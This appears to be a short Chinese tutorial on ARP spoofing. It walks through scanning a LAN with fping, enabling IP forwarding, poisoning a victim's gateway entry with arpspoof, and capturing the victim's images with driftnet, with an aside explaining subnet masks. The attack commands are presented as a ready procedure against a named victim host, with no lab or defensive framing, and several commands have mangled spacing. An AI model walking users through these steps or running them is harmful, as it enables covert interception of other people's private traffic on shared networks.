ARP欺骗和劫持流量内图片先学会使用工具,再学习其中的原理。扫描内网中所有的IP,使用fping–asg192.168.1.0/24其
中,192.168.1.0前三段指示你的网段。扩展:如果是有类IP地址,两个IP地址前三段一样就表示这两个IP地址属于同一网段。如
192.168.0.1/24与192.168.0.2/24,因为它们的网络号一样都是192.168.0.0,可以直接通信不需要路由
器。如果是无类IP地址(做过子网划分),即使两个IP地址前三段一样也不一定是在同一个网段,如192.168.0.1/30与192.
168.0.5/30虽然前三段一样但这两个IP地址不在同一网段内,它们的网络号分别是192.168.0.0/30与192.168
.0.4/30,网络号不同所以就不在同一网段,没有路由器的情况下无法直接通信。总结:上述IP地址后的/24与/30表示在此IP地址
中网络位所占位数(如192.168.0.1/24与192.168.0.1?255.255.255.0是一个意思),严格地说判断
两个IP地址是否在同一网段,必须给出两个IP地址相对应的子网掩码,IP地址与子网掩码必须成对出现,不可以单独存在。如192.168
.0.1与192.168.0.5是否在同一网段取决于二者各自的子网掩码,不提供子网掩码就不能下定论说它们是否在同一网段。所以子网掩
码是很重要的!2,使得被欺骗电脑的流量流经我的电脑,原理是网关欺骗,使我的网卡变为被欺骗的网关。使用命令echo1>/pr
oc/sys/net/ipv4/ip_forward(指定IP流经我的网卡,1是确定为真执行的意思,相反为0)3之后输入命令:a
rpspoof–ieth0–t192.168.1.1(网关)192.168.1.102(被劫持IP)-I的意思是:Ne
tworkInterfaceCard,网卡。-ttcp的意思显示已经成功劫持。4,输入命令,拦截图片。Driftnet–i
eth0(显示流经我流量的图片)图片会保存在根目录下。 |
|
